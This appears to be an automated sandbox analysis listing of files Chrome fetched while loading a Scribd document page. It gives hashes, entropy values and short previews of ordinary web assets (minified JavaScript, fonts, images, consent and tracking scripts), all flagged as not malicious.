                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5841)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5920
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.108146522184038
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:kGlC+j1bRwZDvhZmph1xzphzt3vj2v/BnwJpeC+j108x:k2xj1WHmT1xzfzQWPexj10i
                                                                                                                                                                                                                                                                                                                                                                                        MD5:40184DB55C0FCE64DEC93F08AE97748B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:2866089F2C4A7325AF815A73218A26920B412BE8
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:446A83F4342D80B931B03B10B546944390BCAE94759498183069D114515BFE24
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A1507B8382990CC15F3DFFB11592C83BA8469B14CCA7F84B22A7642326C08405EF1DD76BBCA22FB05DD7EAE44E34E61772E0FA12041F926EC0C2500DFD632D1B
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/152.a74e3e.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[152],{71503:(e,t,n)=>{n.d(t,{A:()=>h});var o=n(38544),a=n(62832),s=n.n(a),r=n(40880),i=n(96540),l=n(38979),c=n(11865);function _(e,t,n){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var o=n.call(e,t||"default");if("object"!=typeof o)return o;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:t+""}(t))in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}class d extends i.Component{constructor(e){if(super(e),_(this,"set_active_note",(e=>{const{notes:t,note_group:n}=this.props,o=(n.notes.indexOf(this.state.active_note_id)+e+n.notes.length)%n.notes.length,a=n.notes[o];e<0?(0,c.sx)("pdf:note:prev"):(0,c.sx)("pdf:note:next"),this.setState({note_text:t[a].text,active_note_id:a})})),_(this,"
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):34494
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.04653743900993
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:XyuuuuuuxqwduluuuLvs8uuuuUu0u0uu0uusuuuuuXjYOpKiiYk1usoHyHpIeuuS:gNWp+DC/Gh
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C72E311048FF5468267450C0DBD62F21
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:72DC3A21D09CCE73028931818B48EAECE5C5CA69
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:17121C2079DD1094A616EC9DBC35E7537C3C96DD374D915F03A6B140B59441AD
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B09E4D78D716EF231D48614FF1A609367809B48E40EAAD497907346C334FCCDD380459A49CB76CBA0BFF9C65E98E742C66B9BD496CFB12CC55189F9C1F74A3EC
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/scribd.ico?de2a209e8?v=5
                                                                                                                                                                                                                                                                                                                                                                                        Preview:............ .h...V......... ......... .... .....F...00.... ..%......@@.... .(B...D..(....... ..... ......................................... ..2XQ..|r... ... .|r..XQ.. ..2............................[T.... ... ..."...>...I...7... ... .[T......................og... ...A..........................e... .og..............[T.... ...x..........S...%... .../...........g... .[T...... ..2.. ... ..........-... ... ... ... ... .......... ... . ..2XQ.... ... ...%......G... ... ... ...n.............. ... .XQ..|r... ... ... ... ... ... ... ...,................... ... .|r... ... ... ... ...d.........(...&.................. ... ... ... ... ... ...K.................. ...O.........'... ... ... .|r... ... ..................... ... ... ... ... ... ... .|r..XQ.... ... ................)... ... ...?..._... ... ... .XQ.. ..2.. ... ...k......./... ... ... ... ...n.......<... ... . ..2....[T.... ...#...........Z.......3..._..........]... .[T..............og... ...+......................
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (50758)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):51039
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.247253437401007
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                                                                                                                                                                                                                                                                                                                                        MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (59996)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1778653
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0046165033608645
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:uMUmkjFcmmz29zENBbyEppLpBpuhpuLpapqpNpLpPpCN:o
                                                                                                                                                                                                                                                                                                                                                                                        MD5:226977CE1CBCEA213EC26DD6EAD9FCFF
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1EAEFCA7F636876132EB503A463B82FDB4056FF0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:31B924434B3DE26C45C679B80DDF1BA640F8BCB401B6E44B642134C3AD653183
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1BF58FBE06F59239A61B8038A39F2B0D0831C6CA8FB2891238E7F03FF53636A776724F5912B0ED7140FEA19443D54B45B878A86C69F2A9C412FAE08BACA47BC7
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://www.scribd.com/document/801519291/Advice-Notification
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE HTML><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><head prefix="og: http://ogp.me/ns# scribd-com: http://ogp.me/ns/apps/scribd-com#"><link rel="preconnect" href="https://s-f.scribdassets.com/"><link rel="preconnect" href="https://html.scribdassets.com"><link rel="preload" crossorigin="anonymous" href="https://s-f.scribdassets.com/webpack/assets/fonts/source_sans_pro/regular/source_sans_pro_regular.latin.e8ecbdac.woff2" as="font" type="font/woff2"><link rel="preload" crossorigin="anonymous" href="https://s-f.scribdassets.com/webpack/assets/fonts/source_sans_pro/semibold/source_sans_pro_600.latin.76017e81.woff2" as="font" type="font/woff2"><link rel="preload" href="https://cmp.osano.com/AzZdHGSGtpxCq1Cpt/4e10b135-d113-4574-a477-270ace40bba7/osano.js?language=en" as="script"><script>window.Scribd = window.Scribd || {}; window.Scribd.config = {"js_logging_enabled":fa
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4650
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.9458855390606242
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:UjifNqC3eCa6dX+Lkh+Q0CReCCydhMekeJuiCC29y+k:4ifNqKeCnX+Ih+Q0OsiCC29y+k
                                                                                                                                                                                                                                                                                                                                                                                        MD5:A0CBC82C3C7BCE3B368E2118B3CB29D3
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F962C6CDC8FD2F423A765C3C1FA4AD979B18B81D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0DCEFA0B117FA5DC44EEFA92D2BF221F3455B29354CC940F144BB268100FC116
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9A8607FF9AE95609205A5273B3AD3C3BA450B344A34B0CDB73E866397DF860DC2F645A412BA89BABD43ACE7BE320CBFDE83297FD6A70FD224D22C251931750FD
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://cmp.osano.com/
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<html>. <head>. <script>. if (window !== window.top) {. var GET_STORAGE = 'GET_STORAGE';. var CLEAR_STORAGE = 'CLEAR_STORAGE';. var RECEIVE_STORAGE = 'RECEIVE_STORAGE';. var UPDATE_STORAGE = 'UPDATE_STORAGE';. var VALIDATE_IFRAME = 'VALIDATE_IFRAME';. var VALIDATE_IFRAME_RESPONSE = 'VALIDATE_IFRAME_RESPONSE';.. window.addEventListener(. 'message',. function (event) {. var expDate = undefined;. var data = event.data;. if (typeof data !== 'string') {. return;. }. (origin = event.origin),. (source = event.source),. (splitData = data.split('|'));. try {. j = JSON.parse(data);.
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 149x198, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):8556
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.976599549435886
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:1s2fpuWHn9XrlZrv0pXkhDyhLyzSFDsoGnHYN0XoZ/zRH:1sypuWHn97lZYpHpFIIiXoX
                                                                                                                                                                                                                                                                                                                                                                                        MD5:2BD5661785F46D3625DEF346D973A6F2
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C3255EAE373757D15587D7C8DDDCF2B0A59DD8E6
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CAF11F16259F4179979597C353E15E5B7A29571A9D9E1CEB1ECD6EA453AAB814
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0375482221BDAFF833C2D4976D267EAECB3886A3BF22DE785BA82E1D53F8D39B5B4BE347BB59F414106208872078459C330A1E88645272B25A2E3DCE0559EFE3
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://imgv2-2-f.scribdassets.com/img/word_document/322011392/149x198/75a60db5ed/1732968212?v=1
                                                                                                                                                                                                                                                                                                                                                                                        Preview:RIFFd!..WEBPVP8 X!...t...*....>m,.E."... @......'.P..}..|..7.o..X{|.....o...;...W...~..O....]m_..zl`.q.....Y.O._........N.]../.W......c./...........w.......=.S.......$.....)...7.....~...z..3.7../.'...".....K......F. ........T..}.._e.b3.n_m..D.oW#.._..:R%&.Yl<...En...|/Im..g..Pn.H.#....=....n.......LWh........(.[...0.}Rq...@#..1.{5.-b...X..V....q.+....h..;..<..X.|.Q.F../...q..S..4".....H^#../...VRf....[U......i..Bib8M...C..[).z...c.@'.L4.q....6K.~...k@}...UybW_ .z...)...>B.g........2.4..z.&.9.T..9.....6D.Y.'#]........Shz,.......r........v. ...+.j.4q.F......;.'+.\.23.?..Z.c..2K.....-......{f.........z.&}....>..F../.'..S..~...4 $..r.,u........t.*w.Y......).<igO..n....H....*,.....C...-BpmX*.1.;...!jVU.p.(.[..1sC*.W..[/....pr=.m.....-..P......5?.N....L..T.q..+s..ur.0.L..}.l..n...|..m...k..5...g..7..?.t..GQ-..X....s'...(.)j.........7._.d.....W#.}..J.,TPuB_..M.X...k.EB....,.......Q..&...V._. ....X2.}..totA..-.........N.zO5.y.|5ZB...@6
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 20972, version 1.0
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):20972
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.989161590300238
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:IooE95EH8e1329lCCnq0uWgFm8UOQy1dIugNy5fJkN+gTlBHa5ip/wY7EA:5o05EH8k2igqHHQy1dIugcxkNVR1oYb
                                                                                                                                                                                                                                                                                                                                                                                        MD5:6EACD53A47836843A14D4D30F0B512C3
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:72F624A2621BDDEFDEAC5C8C51661A910C8EA631
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:53D3959A8B9917A6F67AB4E7BBB54F0CD74EA46149704D6B263F4576A35101AB
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:478C763BA751BA1A069F07B4E762731E77D4E671BCF25A4AC74CE0B7BC8F1BF83CFE3AF18876A2BAC2C2A1A4799062D608ACA4D9EF01ABF981FC631D20CCAB4A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/assets/fonts/source_serif_pro/semibold/source_serif_pro_semibold.latin.f74d6620.woff2
                                                                                                                                                                                                                                                                                                                                                                                        Preview:wOF2......Q...........Q...............................p..t.`........$..x..x..6.$..j. .......u...m..6../;..b6.v;.S...GEm&.X....9.h..*x R..Tu.vQ...a...*.......g....+.A...N/.$.S|>...O.....'~.....q:6i.t....Y..7..6..,.mkt...#.v...~..3..7s.&..HjP.!...,Z....yZ[......lf3.d.E.T.O1.....,..K..*.h/R.....v....M.F1i"......2..M.&..f....s.) (B..|.. ...'JAB@.....EY9..w.e]n.....O;....*+..8.<o%.....~..`...9%..1$..Xw..g.c.c.5k.p..dL........:..#.n.X.gMb..8...,l~.E.K.9OQ...R..x2k..5j)l.*....# .R.{...P.KY........JU.............I...E..!.......u..........o....d<.A..=.R.RW....ZZ..D.'.r..U.k.L4.$..'..jqV..y.....R..&..'..D".H.9j.{.T[....0...5<P.U.mL0..1...n..w.....O.$=......_.Zg(.cA.......U...v.X.;un]4....,].M.q..*......z&bm5hf.`....F....h(... ..?.......'.V..D..:0....+......}.........!$..\..k.(0......J[....9....R..*..A.g..>....M.N......+..8.T.[..s'"._../.R..*c..a.......g.T.,....I..p.._...w....I....k....*""""F,cD..g?.:..u.5....@@x ....~c.@7.+....d..(..(.T.......6
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4832)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4911
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.1709357627837615
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:5/0idI3skCMhviFxIU1K/EjN0idZINUZFlXxiCHAi:OidI3skCMViFxIpEuidZdFxvHD
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D5A63442D1B8E76623500CE96549D69B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8C1D71938E2C60E5BD39B8534018283114C2F869
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E9EF1E9FC63723FDEB5E8B73DF343C57C4726489E74EDCCBFB8DC8383B4B61AB
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:4C2039878A21EB838F474139CCCF719BACA07B61380A88CD44EEE65A4FFB65A98DA2D7F5A7591E700243AC761DE5263787FD78E04B3C8CD46F3A31676EC4A9DD
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/450.f2b337.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[450],{77450:(e,a,t)=>{t.r(a),t.d(a,{default:()=>u});var n=t(62832),r=t.n(n),i=t(40880),s=t(96540),l=t(38979),o=t(11865),c=t(60164);function d(e,a,t){return(a=function(e){var a=function(e,a){if("object"!=typeof e||!e)return e;var t=e[Symbol.toPrimitive];if(void 0!==t){var n=t.call(e,a||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===a?String:Number)(e)}(e,"string");return"symbol"==typeof a?a:a+""}(a))in e?Object.defineProperty(e,a,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[a]=t,e}class u extends s.Component{constructor(e){super(e),d(this,"handleSaveClick",(()=>{(0,o.sx)("language_picker:modal:save",{locale:this.state.selectedLanguage.lang,current_locale:this.props.currentLanguage.lang}),window.location=this.state.selectedLanguage.href})),d(this,"handleCancelClick",(()=>{(0,o.sx)("language_picker:mo
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):103
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.40578787671492
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YGWT6RqzglKtvNep7usIdVyrVS20TZYdlzUMkHY:YGWeas7jIdVSVSTColHY
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3B9A66D0DA13DECE7152031960C61D01
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0835FA81E19B852B807176A8CA89311962A25F2A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B33FB883864E9661824DDF0F41E6B677BDCDEB2A247B2440909FB278BAB8C40E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:085E610B2872693895CE5AD3AE7061DE2967B73A50C8B69EAB163050F095ADABFC31991FDBC004B35CB179831FE1D944BE0F3418CDD505A1AD9AC66F04371D77
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:{"csrf_token":"3L0m9Okw4Qoj0zB2VTrYo0-XLrIOKI-Mt90P21UgBNfnkIbd-zZTooTUQ6cPPgb9BILTdK8rIpiVQsucIij_iA"}
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):52916
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                                                                                                                                                                        MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.779486743739521
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YTyLV/Vf1+xNVcSLQzRE9LduVB4:YWLV91iDLQmpdIB4
                                                                                                                                                                                                                                                                                                                                                                                        MD5:EA03273602AC31C0858FA2D9A1895526
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4F8AFE25482A22C6858AF1F58E55D83F9DF9B854
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:98D77039EA9249B3DCE91AD7B467EE382F29DAA61213C3E2737BD4A8786C8801
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:77FF06E103CA553FAD14E5F865764CDA76777F83800C439ED91B22B26935146863F9D0C3BBBD3EE95E02C69A1A1C29D0C12A5D9B9D1D619CEEBCF1DCCB422238
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:{"version_hash":"49267bce","url":"https://www.redditstatic.com/ads/49267bce/pixel.js"}
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 149x198, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):6538
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.967359427521469
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:HNAYnrU3lWVGzm3EwQdFpIOpEpGpPBpkKLRwWsFcHboHcGBxAi6f+fTiGapweTWR:jAwVviFoGDVs6HbIxBkf+oSB3f
                                                                                                                                                                                                                                                                                                                                                                                        MD5:82BC98D41448DED30811CE14C66F4EF3
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A9ACA8798F02FE396836264E2D7646C032736169
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1E2AC77FAADBF3A00A25B1432112E7386D71515B7CEB784159A1A11DFFA5875A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7591055975F8ECCE83E25391EB168FD180D6B23C408F1B011E4D1F421B570F3528F8914FE4578EA83612AFCB594CCB92B18A2DF62E53D2969E51EDEEFFA88D90
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://imgv2-1-f.scribdassets.com/img/word_document/308030757/149x198/2af38cbda9/1731726615?v=1
                                                                                                                                                                                                                                                                                                                                                                                        Preview:RIFF....WEBPVP8 v...Pn...*....>e*.E."..:g.@.D..k.-.?...r..~.9U...o...OP..}E....~.{....`.W.......;..3..o.Q...w..w......_...........{.......yQ.......?........?.......[?.?@.f........-.S...o.........'..`/....}.}7.{......Q.X...G.!...c.7....e....'.H."....8s<..O.,..4.V...g..... j....&.aQ`=.H=..........X:F./A.(....s.....i.U.Of>J.Mc.lC..G+_+..J..wx..*Y#.....A$w...M.c..c\Pys^5$C.8..%h.3..(V_A>...*..Y6..=S.8...C.....L65.S...H..kK.l`....(j...}'.N..c..%.T}..L:^..s....[=.Y.."..E...~....A >b.T./0.>f.EW2.o?..Y..o...).W.Q.....HG.:.k..."M.....H...t."k/l...9|..{.S.....C..U.B".<..~.....z?.%t.s.p.cOC..3q.a....*.yZmu.u+..g......(..Vy.y.z..*~3.v.@6%}K..#.0#+Pj................J.).9.....tc......b...<........I..s.t.W{...^g.?......o..3)...(...W5./.n..|..Cx....P.y....M^v!.........)f..]I...8..2i.Eg.......Ph5qX.a.l.'%.yv6..._X.).wL.Ei........X...%&..?.n..-..z......,w0.'>..V....(....m..&....O.mI..5.?$...we.K.x../Px.maG4.G..[...|.+...E.l".MUl.ZR..|.+.5u!...G..
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):308493
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.42001093614717
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:zZUfODvfYgFOJNkAusB/M+OXJb+UtXvmZ+bWh/qpOr:zZUfPguua/M+KC
                                                                                                                                                                                                                                                                                                                                                                                        MD5:61F01DAF41A3CAEA2F0BADC4B5971FC5
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1E377416218E56C3DF12FB0FCCEF346E16BA63D5
